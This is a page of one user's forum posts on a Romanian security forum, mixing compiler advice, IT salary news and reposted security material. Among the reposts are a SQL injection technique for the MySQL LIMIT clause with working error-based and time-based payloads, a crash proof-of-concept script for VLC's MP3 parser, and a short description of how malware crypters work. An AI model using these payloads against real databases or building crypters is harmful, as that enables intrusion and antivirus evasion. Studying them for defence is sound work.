Everything posted by Nytro
-
See this: https://ro.wikipedia.org/wiki/Automat_finit

As for "compiling", that is, turning source code into an executable... Start with something simple:

1. Create a finite automaton
2. Process a simple language, e.g. write(123)

Create a well-defined syntax. More precisely, you take the input character by character and:
a. Do you have a letter? Hmm, it looks like the name of a function. Move on.
b. Is the next character "("? It means the function name ("write") is finished and a parameter follows.
c. Is the next character ")"? It means "123" is a parameter for "write".

These are states. The ones in circles are states. The lines mean processing character by character and the state you move into. For example, from the "function" state, you read a letter, you return to the same state and add that letter to the function name. But if you read the character "(", you go to the "param" state and read the value digit by digit. It's a very simple case. You have to take every possibility into account and go to the "compile error" state if something is not right.

3. After that, you interpret that language of yours.

It's nice what you want to do, but it can get complicated. Search for compiler theory, there are many articles; what I said is just an idea, it may not be the best one.

Then, if you want an "exe", you have to transcribe from that finite automaton into assembly language. If you manage that, you will be able to assemble into executable code: you create an empty PE file (Portable Executable, the exe structure), point the Entrypoint to a ".text" section (or whatever name you want) that is "readable and executable" and put that code there. If you have data, you will need a special section. It's too complicated. Try something simple and interpreted, a script like that "write(123)".

--------------------------------------------------------------------

Now I see what you actually want to do. A crypter works like this:
1. You have an EXE already created
2. You put the encrypted file "at the end" or "inside"
3. You put some configuration data, as above

In that configuration data you specify the encryption and maybe the key. Or you give it a way to somehow receive the decryption key from somewhere. As for how a crypter works, it's not that simple: you have to load an executable into memory. But you can find plenty of source code to learn from, though it will take you some time.
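The automaton sketched above, written out as an added example (not code from the original post): a character-by-character parser for the one-line language name(digits), with the "function", "param", "done" and "compile error" states, plus the tiny interpreter from step 3. The builtin "write" is a hypothetical name chosen for the demo.

```python
# Added example (not from the original post): a finite-state automaton for the
# one-line language  name(digits)  from the post, e.g. write(123). The states
# are the ones the post sketches: "function", "param", "done" and an explicit
# "compile error" state reached on any unexpected character.
from dataclasses import dataclass
from typing import Optional

FUNC, PARAM, DONE, ERROR = "function", "param", "done", "compile error"


@dataclass
class ParseResult:
    state: str
    name: str = ""
    arg: Optional[int] = None
    error: str = ""


def parse_call(source: str) -> ParseResult:
    """Walk the input character by character, moving between states."""
    state, name, digits = FUNC, "", ""
    for pos, ch in enumerate(source):
        if state == FUNC:
            if ch.isalpha():
                name += ch          # stay in "function", extend the name
            elif ch == "(" and name:
                state = PARAM       # name finished, a parameter follows
            else:
                return ParseResult(ERROR, name, None, f"unexpected {ch!r} at {pos}")
        elif state == PARAM:
            if ch.isdigit():
                digits += ch        # stay in "param", extend the value
            elif ch == ")" and digits:
                state = DONE        # ")" closes the parameter list
            else:
                return ParseResult(ERROR, name, None, f"unexpected {ch!r} at {pos}")
        else:                       # DONE: nothing may follow ")"
            return ParseResult(ERROR, name, int(digits), f"trailing {ch!r} at {pos}")
    if state != DONE:
        return ParseResult(ERROR, name, None, "unexpected end of input")
    return ParseResult(DONE, name, int(digits))


# Step 3 of the post: interpret the accepted language. Only "write" exists here
# (a hypothetical builtin); it returns the text it would print.
BUILTINS = {"write": lambda value: str(value)}


def run(source: str) -> str:
    result = parse_call(source)
    if result.state == ERROR:
        return f"compile error: {result.error}"
    if result.name not in BUILTINS:
        return f"compile error: unknown function {result.name!r}"
    return BUILTINS[result.name](result.arg)


if __name__ == "__main__":
    for src in ("write(123)", "write(12a)", "write()", "print(1)"):
        print(f"{src:12} -> {run(src)}")
```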
-
You earn better on SAP, there are more opportunities in Java. The choice is difficult.
-
SQL Injections in MySQL LIMIT clause

Countless articles have been written on the exploitation of SQL Injections. This post is dedicated to a very specific situation. When assessing the severity of a SQL Injection in a certain application, I encountered a problem which I was not able to solve quickly using web search. It's about the question whether a SQL injection vulnerability in the LIMIT clause in a MySQL 5.x database is currently exploitable. Example query:

SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT injection_point

Of course, important is the fact that the above query contains an ORDER BY clause. In MySQL we cannot use ORDER BY before UNION. If ORDER BY was not there it would actually be very easy to exploit simply using UNION syntax. The problem appeared at stackoverflow and it was discussed at sla.ckers too. Sorry, no results. So let's look at the syntax of SELECT in the MySQL 5 documentation:

SELECT
    [ALL | DISTINCT | DISTINCTROW ]
      [HIGH_PRIORITY]
      [STRAIGHT_JOIN]
      [SQL_SMALL_RESULT] [SQL_BIG_RESULT] [SQL_BUFFER_RESULT]
      [SQL_CACHE | SQL_NO_CACHE] [SQL_CALC_FOUND_ROWS]
    select_expr [, select_expr ...]
    [FROM table_references
    [WHERE where_condition]
    [GROUP BY {col_name | expr | position}
      [ASC | DESC], ... [WITH ROLLUP]]
    [HAVING where_condition]
    [ORDER BY {col_name | expr | position}
      [ASC | DESC], ...]
    [LIMIT {[offset,] row_count | row_count OFFSET offset}]
    [PROCEDURE procedure_name(argument_list)]
    [INTO OUTFILE 'file_name' export_options
      | INTO DUMPFILE 'file_name'
      | INTO var_name [, var_name]]
    [FOR UPDATE | LOCK IN SHARE MODE]]

After the LIMIT clause the following clauses may occur: PROCEDURE and INTO.

The INTO clause is not interesting, unless the application uses a database account with permission to write files, which nowadays is a rather rare situation in the wild. It turns out that it is possible to solve our problem using the PROCEDURE clause. The only stored procedure available by default in MySQL is ANALYSE (see docs). Let's give it a try:

mysql> SELECT field FROM table where id > 0 ORDER BY id LIMIT 1,1 PROCEDURE ANALYSE(1);
ERROR 1386 (HY000): Can't use ORDER clause with this procedure

The ANALYSE procedure can also take two parameters:

mysql> SELECT field FROM table where id > 0 ORDER BY id LIMIT 1,1 PROCEDURE ANALYSE(1,1);
ERROR 1386 (HY000): Can't use ORDER clause with this procedure

Does not bode well for us. Let's see whether the parameters of ANALYSE are evaluated.

mysql> SELECT field from table where id > 0 order by id LIMIT 1,1 procedure analyse((select IF(MID(version(),1,1) LIKE 5, sleep(5),1)),1);

gives us an immediate response:

ERROR 1108 (HY000): Incorrect parameters to procedure 'analyse'

Therefore, sleep() is certainly not being called. I didn't give up so fast and I finally found the vector:

mysql> SELECT field FROM user WHERE id >0 ORDER BY id LIMIT 1,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);
ERROR 1105 (HY000): XPATH syntax error: ':5.5.41-0ubuntu0.14.04.1'

Voilà!

The above solution is based on the handy, well-known technique of so-called error based injection. If, therefore, our vulnerable web application discloses the errors of the database engine (there is a real chance, such bad practices are common), we solve the problem. What if our target doesn't display errors? Are we still able to exploit it successfully? It turns out that we can combine the above method with another well-known technique - time based injection. In this case, our solution will be as follows:

SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT 1,1 PROCEDURE analyse((select extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5, BENCHMARK(5000000,SHA1(1)),1))))),1)

It works. What is interesting is that using SLEEP is not possible in this case. That's why there must be a BENCHMARK instead.

Update: As BigBear pointed out in the comment, a very similar solution was actually posted earlier on rdot. Thanks!

Update: It would be awesome if this technique were implemented in sqlmap.

Source: https://rateip.com/blog/sql-injections-in-mysql-limit-clause/
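As an added example (not from the article or the forum post), the defender's side of the same query: the vulnerable string-splicing pattern beside a hardened builder that validates both LIMIT operands, and a detector that runs over constructed query-log lines and flags the PROCEDURE ANALYSE vectors shown above while leaving a plain ANALYSE call alone. Table and column names are hypothetical.

```python
# Added example (not from the article): validating LIMIT operands before they
# are spliced into a query, beside a detector for the PROCEDURE ANALYSE vectors
# the article shows. Table and column names are hypothetical.
import re

BASE = "SELECT field FROM t WHERE id > 0 ORDER BY id LIMIT "

# A canonical non-negative integer: digits only, so no sign, whitespace,
# comma or keyword (e.g. "1,1 PROCEDURE ANALYSE(...)") can ever pass.
_INT_RE = re.compile(r"\d{1,9}")


def is_valid_limit_operand(value) -> bool:
    return _INT_RE.fullmatch(str(value)) is not None


def build_query_vulnerable(limit: str) -> str:
    """The pattern the article attacks: raw user input after LIMIT."""
    return BASE + limit


def build_query_safe(offset, row_count, max_rows: int = 100) -> str:
    """Hardened form: both operands validated and the page size capped."""
    if not (is_valid_limit_operand(offset) and is_valid_limit_operand(row_count)):
        raise ValueError("LIMIT operands must be non-negative integers")
    off, cnt = int(str(offset)), int(str(row_count))
    if cnt > max_rows:
        raise ValueError("row_count above the allowed page size")
    return f"{BASE}{off},{cnt}"


# Detection: PROCEDURE ANALYSE() is legitimate MySQL syntax on its own; what
# marks the article's error-based and time-based vectors is an error-raising
# or time-consuming function inside its argument list.
_PROC_RE = re.compile(r"procedure\s+analyse\s*\(", re.IGNORECASE)
_FUNC_RE = re.compile(r"\b(extractvalue|benchmark|sleep)\s*\(", re.IGNORECASE)


def flag_limit_injection(log_lines):
    """Return (line number, sorted marker functions) for suspicious lines."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        proc = _PROC_RE.search(line)
        if not proc:
            continue
        funcs = sorted({f.lower() for f in _FUNC_RE.findall(line[proc.end():])})
        if funcs:
            hits.append((n, funcs))
    return hits


# Constructed sample query-log lines (not real traffic): line 2 carries the
# article's error-based payload, line 3 the time-based one, line 4 a benign
# ANALYSE call that must not be flagged.
SAMPLE_LOG = [
    "q1: " + BASE + "0,10",
    "q2: " + BASE + "1,1 PROCEDURE ANALYSE(extractvalue(rand(),concat(0x3a,version())),1)",
    "q3: " + BASE + "1,1 PROCEDURE analyse((select extractvalue(rand(),concat(0x3a,"
    "(IF(MID(version(),1,1) LIKE 5, BENCHMARK(5000000,SHA1(1)),1))))),1)",
    "q4: " + BASE + "5,10 PROCEDURE ANALYSE(10,256)",
]

if __name__ == "__main__":
    print(build_query_safe("1", "1"))
    for n, funcs in flag_limit_injection(SAMPLE_LOG):
        print(f"log line {n}: PROCEDURE ANALYSE argument calls {funcs}")
```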
-
Junior developer - 750 EUR, minimum? Yeah, I don't know what to say.
-
Funny, haha, suck it, Steaua! PS: There's no point hiding your IP in the browser when you connect on 3306 with your real IP...
-
How to get into someone's PC with KALI LINUX using an EXPLOIT PAYLOAD
Nytro replied to osanul's topic in Video tutorials
At least give it a more academic title.
Gaming PC - OPINION PLEASE
Nytro replied to osanul's topic in Operating systems and hardware discussions
Asus ROG G771JW-T7091D Gaming Laptop with Intel® Core™ i7-4720HQ processor, 2.60GHz, Haswell™, 17.3", Full HD, IPS, 12GB, 1TB + 256GB SSD, Blu-Ray R, nVidia GeForce GTX 960M 4GB, Free DOS, Black - eMAG.ro
Asus ROG G751JT-T7210D Gaming Laptop with Intel® Core™ i7-4720HQ processor, 2.60GHz, Haswell™, 17.3", Full HD, IPS, 16GB, 1TB + 128GB SSD, Blu-Ray R, nVidia GeForce GTX 970M 3GB, Free DOS, Black - eMAG.ro
Which two programming languages together cover the largest field in programming?
Nytro replied to MrGrj's topic in Programming
It's faster to write in Python:

import urllib2
response = urllib2.urlopen('http://python.org/')
html = response.read()

#include <winsock2.h>
#include <windows.h>
#include <iostream>
#include <cstring>
#pragma comment(lib,"ws2_32.lib")
using namespace std;

int main() {
    WSADATA wsaData;
    if (WSAStartup(MAKEWORD(2,2), &wsaData) != 0) {
        cout << "WSAStartup failed.\n";
        system("pause");
        return 1;
    }
    SOCKET Socket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    struct hostent *host = gethostbyname("www.google.com");
    if (host == NULL) {  // the DNS lookup can fail; h_addr must not be dereferenced then
        cout << "Could not resolve host";
        system("pause");
        return 1;
    }
    SOCKADDR_IN SockAddr;
    SockAddr.sin_port = htons(80);
    SockAddr.sin_family = AF_INET;
    SockAddr.sin_addr.s_addr = *((unsigned long*)host->h_addr);
    cout << "Connecting...\n";
    if (connect(Socket, (SOCKADDR*)(&SockAddr), sizeof(SockAddr)) != 0) {
        cout << "Could not connect";
        system("pause");
        return 1;
    }
    cout << "Connected.\n";
    const char *request = "GET / HTTP/1.1\r\nHost: www.google.com\r\nConnection: close\r\n\r\n";
    send(Socket, request, strlen(request), 0);
    char buffer[10000];
    int nDataLength;
    while ((nDataLength = recv(Socket, buffer, 10000, 0)) > 0) {
        // print only the bytes actually received, stopping at control characters
        for (int i = 0; i < nDataLength && (buffer[i] >= 32 || buffer[i] == '\n' || buffer[i] == '\r'); i++) {
            cout << buffer[i];
        }
    }
    closesocket(Socket);
    WSACleanup();
    system("pause");
    return 0;
}
VLC Mp3 parser stack overflow

# Version: 2.2.1
# Tested on: Windows 7 Professional 64 bits
#APP: vlc.exe
#ANALYSIS_VERSION: 6.3.9600.17336 (debuggers(dbg).150226-1500) amd64fre
#MODULE_NAME: libvlccore
#IMAGE_NAME: libvlccore.dll
#FAILURE_ID_HASH_STRING: um:wrong_symbols_c00000fd_libvlccore.dll!vlm_messageadd
#Exception Hash (Major/Minor): 0x60346a4d.0x4e342e62
#EXCEPTION_RECORD: ffffffffffffffff -- (.exr 0xffffffffffffffff)
#ExceptionAddress: 00000000749ba933 (libvlccore!vlm_MessageAdd+0x00000000000910d3)
# ExceptionCode: c00000fd (Stack overflow)
# ExceptionFlags: 00000000
#NumberParameters: 2
# Parameter[0]: 0000000000000001
# Parameter[1]: 0000000025ed2a20
#
#eax=00436f00 ebx=2fdc0100 ecx=25ed2a20 edx=00632efa esi=17fb2fdc edi=00000001
#eip=749ba933 esp=260cfa14 ebp=260cfa78 iopl=0 nv up ei pl nz na po nc
#cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
#
#Stack Overflow starting at libvlccore!vlm_MessageAdd+0x00000000000910d3 (Hash=0x60346a4d.0x4e342e62)
#

import eyed3
value = u'B'*6500000
audiofile = eyed3.load("base.mp3")
audiofile.tag.artist = value
audiofile.tag.album = u'andrea'
audiofile.tag.album_artist = u'sindoni'
audiofile.tag.save()

Link: https://ghostbin.com/paste/x7kjh
-
How much money can you earn as an IT specialist in Romania and which are the most sought-after programming languages
Florin Casota, posted on 20 October 2015

The company Brainspotting has published a report presenting the IT market in Romania. According to the report, there are approximately 100,000 IT&C specialists nationwide, over 90% of them speak English and 27% also know French. In 2014, Romania had representatives at the informatics olympiads, where the teams won one gold medal and 3 silver medals, in a competition in which 11 countries participated.

The most sought-after are software development specialists (55%), testers (QA - 9%), Mobile Developers (iOS/Android - 4%) etc., and the most sought-after programming language is Java (28%), followed by PHP (15%) and .Net/C# (15%), then C/C++ (12%).

The benefits most sought by IT specialists in Romania are: medical insurance (64%), followed by flexible working hours (49%), financial support for trainings (35%), Christmas or Easter bonuses (28%) and meal vouchers (28%). Most of them accept a job if it offers flexible working hours (41%), followed by salary (38%) and the reputation and image of the company they are about to join (32%).

Bucharest has the most IT&C graduates (2000 per year), followed by Cluj (1700), Iași and Timișoara (1100). But cities such as Brașov, Sibiu or Craiova also register an increase in IT graduates (500 in Brașov and Sibiu and 230 in Craiova).

Salaries in IT&C in Romania start from 500 euro/month for a junior Quality Assurance position, and the highest salary can be obtained by a senior Mac iOS Developer or a Big Data Analyst (2000-3500 euro).

Source: Câți bani poți câștiga ca IT-ist în România și care sunt cele mai căutate limbaje de programare - BusinessMagazin
-
How to get into someone's PC with some sent links
Nytro replied to osanul's topic in Video tutorials
Be careful, he works at the NSA!
A teenager of only 16 from Cluj managed to steal over 60,000 lei from the accounts of clients of several banks. According to investigators, the Cluj native began his "trade" at 13, but until now he had been let off by the authorities. He is accused of committing 13 (thirteen) offences of fraudulently performing financial operations and 3 (three) offences of attempted fraudulent financial operations, as perpetrator.

"Between August and 15 September 2015 the defendant O. C.-I., aged 16, used without authorization the identification data of bank cards issued, as the case may be, by Banca Transilvania, Banca Comercială Română, Unicredit Bank, Millenium Bank and Marfin Bank Romania to 16 (sixteen) holders from all over Romania, performing or attempting to perform fraudulent fund transfers from their bank accounts, for the purpose of purchasing telecommunications and IT products (especially latest-generation mobile phones), transferring money, crediting virtual accounts to convert centralized currency into digital currency, topping up phone cards as well as purchasing electronic games", the indictment states.

In his activity, the minor defendant attempted to fraudulently perform online financial transactions totalling 96,210.18 lei and 40.48 dollars, managing to cause damage of 63,569.14 lei and 31.61 dollars, writes romaniatv.net, citing clujust.ro. The case was forwarded to the Cluj-Napoca Court for competent resolution.

Source: Cluj: Un Hacker de doar 16 ani a furat peste 60.000 de lei din conturile mai multor clienți - Cluj Capitala
-
If C++ is the most powerful, why isn't it the most popular?
Nytro replied to MrGrj's topic in Programming
3. I didn't say it's the only one. Other languages have bindings/wrappers, a performance overhead.
4. Same as above, they have various bindings/wrappers. Moreover, being written in C/C++, the data types of the parameters and return values are the C/C++ ones. In other languages you have to adapt to these requirements.

Yes, you're right about productivity, but using various libraries you can be productive. See boost, it has everything you need, cross-platform.

"The most used language for applications is by far Delphi (over 90%)." - Not even close. Name 2-3 big applications written in Delphi. The most used languages: Java, PHP, C++ (the order doesn't matter). Examples: Microsoft Office, Google Chrome, Firefox, VLC, antiviruses and extremely many others - all in C++ (or C).
Which two programming languages together cover the largest field in programming?
Nytro replied to MrGrj's topic in Programming
C++ + Python
Babun - a windows shell

Would you like to use a linux-like console on a Windows host without a lot of fuss? Try out babun!

Have a look at a 2 minutes long screencast by @tombujok: Introduction to the Babun Project on Vimeo

Installation

Just download the dist file from http://babun.github.io, unzip it and run the install.bat script. After a few minutes babun starts automatically. The application will be installed to the %USER_HOME%\.babun directory. Use the '/target' option to install babun to a custom directory.

Note: There is no interference with an existing Cygwin installation.
Note: You may have "whitespace" chars in your username - it is not recommended by Cygwin though (see the Cygwin FAQ).

Features in 10 seconds

Babun features the following:
- Pre-configured Cygwin with a lot of addons
- Silent command-line installer, no admin rights required
- pact - advanced package manager (like apt-get or yum)
- xTerm-256 compatible console
- HTTP(s) proxying support
- Plugin-oriented architecture
- Pre-configured git and shell
- Integrated oh-my-zsh
- Auto update feature
- "Open Babun Here" context menu entry

Have a look at a sample screenshot! Do you like it? Follow babun on Twitter @babunshell or @tombujok.

Link: https://github.com/babun/babun
-
Copyleft of Simone 'evilsocket' Margaritelli.

bettercap - a complete, modular, portable and easily extensible MITM framework.

bettercap is a complete, modular, portable and easily extensible MITM tool and framework with every kind of diagnostic and offensive feature you could need in order to perform a man in the middle attack.

HOW TO INSTALL

Stable Release (GEM)

gem install bettercap

From Source

git clone https://github.com/evilsocket/bettercap
cd bettercap
gem build bettercap.gemspec
sudo gem install bettercap*.gem

DEPENDS

All dependencies will be automatically installed through the GEM system; in some cases you might need to install a system dependency in order to make everything work:

sudo apt-get install ruby-dev libpcap-dev

This should solve issues such as this one.

EXAMPLES & INSTRUCTIONS

Please refer to the official website.

Source: https://github.com/evilsocket/bettercap
-
OpenSSH

Win32 port of OpenSSH. Look at the wiki for help.

Link: https://github.com/PowerShell/Win32-OpenSSH
-
If C++ is the most powerful, why isn't it the most popular?
Nytro replied to MrGrj's topic in Programming
Why C++ is "powerful":
1. cross-platform - Both open-source and commercial compilers
2. optimized - An interpreted language will never reach its speed
3. capable - Pointers, inheritance, polymorphism and everything you could want from a programming language
4. libraries - STL, Boost, OpenSSL and many other libraries are created to be used from C++
5. stable - An old standard, well defined, implemented and understood

Why isn't it popular?
1. It's not for the faint of heart.
It's on Youtube, it must be true.
-
Advanced x86: Introduction to BIOS & SMM

PC BIOS/UEFI firmware is usually "out of sight, out of mind". But this just means it's a place where sophisticated attackers can live unseen and unfettered. This class shares information about PC firmware security that was hard-won over years of focused research into firmware vulnerabilities. We will cover why the BIOS is critical to the security of the platform. This course will also show you what capabilities and opportunities are provided to an attacker when BIOSes are not properly secured. We will also provide you tools for performing vulnerability analysis on firmware, as well as firmware forensics.

This class will take people with existing reverse engineering skills and teach them to analyze UEFI firmware. This can be used either for vulnerability hunting, or to analyze suspected implants found in a BIOS, without having to rely on anyone else.

Learning Objectives
* Understand the similarities and differences between the UEFI and legacy BIOS
* Understand the BIOS/UEFI boot environments and how they interact with the platform architecture
* How the BIOS/UEFI should configure the system to maximize platform security, and how attackers have bypassed these security mechanisms
* How System Management Mode (SMM) is instantiated and must be protected
* How SMM may be used to provide added layers of platform security
* How the BIOS flash chip should be locked down, and what kind of attacks can be done when it is not
* Learn how to Reverse Engineer UEFI modules
* To teach you "how to fish" so you can take your newly-acquired knowledge to perform further security research in this area

Link: IntroBIOS
-
Adobe Flash IExternalizable.writeExternal Type Confusion

Authored by Google Security Research, natashenka

If IExternalizable.writeExternal is overridden with a value that is not a function, Flash assumes it is a function even though it is not one. This leads to execution of a 'method' outside of the ActionScript object's ActionScript vtable, leading to memory corruption.

Link: https://packetstormsecurity.com/files/134009/Adobe-Flash-IExternalizable.writeExternal-Type-Confusion.html
-
Yes, I open the app for the first time, I can't delete an email until it has fully loaded. It loads, I delete the email, Inbox empty. Refresh, the email is still there. "Send feedback".